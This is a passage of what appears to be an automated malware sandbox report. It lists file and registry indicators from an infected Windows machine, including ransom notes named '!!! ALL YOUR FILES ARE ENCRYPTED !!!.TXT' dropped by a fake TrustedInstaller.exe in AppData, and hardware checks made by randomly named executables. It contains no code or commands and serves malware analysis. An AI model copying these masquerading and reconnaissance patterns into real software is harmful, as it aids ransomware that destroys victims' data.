| File created | C:\Program Files\Microsoft Office\root\Office16\FPA_f7\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2106.14307.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-256_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.4.0_x64__8wekyb3d8bbwe\Assets\Icons\StickyNotesSplashScreen.scale-200_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Todos_0.48.41901.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\StoreLogo.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\GenericMailBadge.scale-150.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-125.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1589.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID346.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8C00.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI19C0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDBD6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF3C6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1FCC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI22AB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFAC17E9B6DBFF2C1E.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEAEC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f767b66.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFF002223B35C293EE.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\f767b66.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE107.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFE27.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFF3B9684D5E4B6CCF.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8CFF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF841A1ADDDB05F725.TMP | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
